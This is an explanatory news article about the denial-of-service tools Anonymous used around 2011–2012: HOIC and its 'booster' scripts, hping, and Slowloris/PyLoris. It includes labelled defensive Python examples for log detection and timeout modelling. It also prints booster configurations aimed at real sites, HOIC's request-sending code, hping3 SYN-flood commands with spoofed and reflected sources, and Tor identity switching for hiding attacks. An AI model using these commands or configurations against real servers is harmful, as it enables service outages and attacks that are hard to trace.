High Orbits and Slowlorises: understanding the Anonymous attack tools
Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm’s way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.
In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”
The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.
HOIC isn’t exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a “lulz” friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.
This rocket needs boosters
The code itself isn’t that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software’s Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using “boosters,” modules with additional bits of Basic code that are interpreted at runtime.
HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. “HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that’s putting it mildly—the attack code is generated based completely on what’s in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.
One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:
// populate rotating urls
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"
The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:
useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:184.108.40.206) Gecko/20070725 Firefox/220.127.116.11"
useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
referers.Append " http://www.google.com/?q=" +URL
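On the defending side, the randomized user agents and referers described above leave a mark in the access log: one source address cycling through several browser identities inside a short burst. The following is an added example, not part of the original article or of HOIC; the function names, thresholds and log lines are constructed for illustration, and it only looks at User-Agent rotation in Combined Log Format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined Log Format: ip - - [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'\d{3} \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

def rotating_clients(lines, window=timedelta(seconds=10), min_requests=6, min_agents=3):
    """Return {ip: (requests, distinct_agents)} for clients that rotate
    User-Agent strings while sending a burst of requests inside `window`."""
    by_ip = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        by_ip[m["ip"]].append((ts, m["ua"]))

    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort(key=lambda h: h[0])
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward
            burst = hits[start:end + 1]
            agents = {ua for _, ua in burst}
            if len(burst) >= min_requests and len(agents) >= min_agents:
                flagged[ip] = max(flagged.get(ip, (0, 0)), (len(burst), len(agents)))
    return flagged

def constructed_sample():
    """Constructed log lines: one rotating client, one ordinary browser."""
    agents = ["Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6.12",
              "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
              "Opera/9.80 (Windows NT 5.1)"]
    fmt = ('{ip} - - [14/Feb/2012:12:00:{s:02d} +0000] "GET {path} HTTP/1.1" '
           '200 512 "{ref}" "{ua}"')
    lines = [fmt.format(ip="203.0.113.7", s=i, path="/?q=%d" % i,
                        ref="http://www.google.com/?q=", ua=agents[i % 3]) for i in range(8)]
    lines += [fmt.format(ip="198.51.100.20", s=i * 7, path="/index.html",
                         ref="-", ua=agents[0]) for i in range(8)]
    return lines
```

A real deployment would tune the thresholds against normal traffic, since shared NAT addresses and proxies can legitimately present several user agents from one IP.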
The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:
UsePost = true
Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:18.104.22.168) Gecko/20101027 Firefox/3.6.12" )
Headers.Append(" Keep-Alive: 115")
Headers.Append("Proxy-Connection: keep-alive")
Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")
Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )
URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"
PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"
While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.
The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:
'Creating the socket request
Dim httpObj as HTTPSocket
Dim i as integer
Dim reqSize as integer = 0
httpObj = New HTTPSocket
' Adding the headers generated by the booster
for i = 0 to Headers.Ubound
  reqSize = reqSize + Headers(i).Len
  httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
Next
'For attacks where POST has been chosen as the type of HTTP request
if(UsePost) then
  reqSize = reqSize + PostBuffer.Len + 4 ' POST
  httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
  httpobj.Post URL
'For GET based attacks
else
  reqSize = reqSize + 3 ' GET
  httpobj.Get URL
end if
'Tracking how much data has been sent to the target
TotalBytesSent = TotalBytesSent + reqSize
But HOIC isn’t the only tool that Anons are promoting.
The old(er) bag of tricks
Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.
Hping is a TCP/IP "packet assembler and analyzer" initially developed and now maintained by Salvatore Sanfilippo, a Sicilian programmer. It uses a command-line interface similar to that of the ping network utility, but it can do a lot more than make ICMP echo requests. It can be used to throw high volumes of TCP requests at a target, while masking the source of the attack through spoofing, as Anonymous’ tutorial shows:
### Normal hping DoS attack:
hping3 -S -i u100 riaa.org
### Spoofed random source address attack:
hping3 -S -i u100 riaa.org --rand-source
### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)
hping3 -S -i u100 riaa.org -a mpaa.org
Slowloris is a different sort of attack entirely—a slow HTTP attack that uses partial HTTP requests to a server, making it wait for more chunks of the request and slowly spooning them out to keep the IP socket on the server open. This type of attack works best against low-traffic sites on Apache and a variety of other Web servers by eating up available network ports on the server. It’s ideal for attacks on servers in places where there’s a concern about there being enough bandwidth for a brute-force DDoS to succeed, or where there’s concern about the collateral damage to other users on the same network. That’s why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.
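Why the slow drip works, and which server-side timer stops it, can be shown with a small model. This is an added example, not code from the article or from any tool it names: the function names and traffic are constructed, and it assumes a served request frees its slot immediately. It compares an idle timeout, which every new chunk resets, with an absolute deadline for receiving the complete header block.

```python
HEADER_END = b"\r\n\r\n"  # blank line that ends an HTTP request header block

def outcome(events, idle_timeout=None, header_deadline=None):
    """events: [(seconds_since_accept, bytes_received)] in time order.
    Returns ("served", t), ("dropped", t) or ("open", None) for one connection."""
    buf, last = b"", 0.0
    # Sentinel at +inf stands for "the client never sends anything else".
    for t, chunk in list(events) + [(float("inf"), b"")]:
        fires = []
        if idle_timeout is not None and t - last > idle_timeout:
            fires.append(last + idle_timeout)   # silence longer than allowed
        if header_deadline is not None and t > header_deadline:
            fires.append(header_deadline)       # headers took too long overall
        if fires:
            return ("dropped", min(fires))
        buf, last = buf + chunk, t
        if HEADER_END in buf:
            return ("served", t)                # complete headers received
    return ("open", None)  # no timeout configured: the slot is never reclaimed

def slots_held(connections, at, **policy):
    """Number of connections still occupying a server slot at time `at`."""
    held = 0
    for events in connections:
        status, t = outcome(events, **policy)
        if status == "open" or t > at:
            held += 1
    return held

def constructed_traffic(slow=200, drips=30, gap=8.0):
    """Constructed input: `slow` trickling clients plus one ordinary request."""
    partial = [(0.0, b"GET / HTTP/1.1\r\nHost: example.test\r\n")]
    partial += [(gap * i, b"X-a: b\r\n") for i in range(1, drips + 1)]
    normal = [(0.05, b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n")]
    return [partial] * slow + [normal]
```

With only a 15-second idle timeout, all 200 constructed slow connections are still held a minute after they were accepted; with a 20-second header deadline, none are.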
But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen.”
However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use more than that."
PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the anonymized Tor Network and switch between Tor "identities," changing the apparent location the attack is coming from at user-defined intervals.